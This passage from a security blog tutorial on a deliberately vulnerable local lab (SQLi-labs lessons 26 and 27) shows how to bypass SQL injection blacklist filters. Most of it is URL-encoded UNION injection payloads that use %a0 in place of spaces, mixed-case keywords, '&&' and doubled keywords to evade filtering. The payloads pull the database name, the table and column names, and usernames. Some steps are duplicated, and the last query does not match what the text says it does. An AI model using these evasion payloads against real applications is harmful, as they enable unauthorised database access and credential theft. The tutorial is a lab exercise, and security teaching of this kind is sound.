http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=’users’%a0%26%26’1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0’1

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out –.

$id= preg_replace(‘/[#]/’,””, $id);                                             //Strip out #.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/select/m’,””, $id);       //Strip out spaces.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/union/s’,””, $id);         //Strip out union

$id= preg_replace(‘/select/s’,””, $id);         //Strip out select

$id= preg_replace(‘/UNION/s’,””, $id);      //Strip out UNION

$id= preg_replace(‘/SELECT/s’,””, $id);       //Strip out SELECT

$id= preg_replace(‘/Union/s’,””, $id);         //Strip out Union

$id= preg_replace(‘/Select/s’,””, $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-27/?id=1′ AND’1=1

 

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Now Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,database(),3%a0AND’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81//sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Bypass SQL Injection Filter Manually appeared first on Hacking Articles.

Categories: Cyber India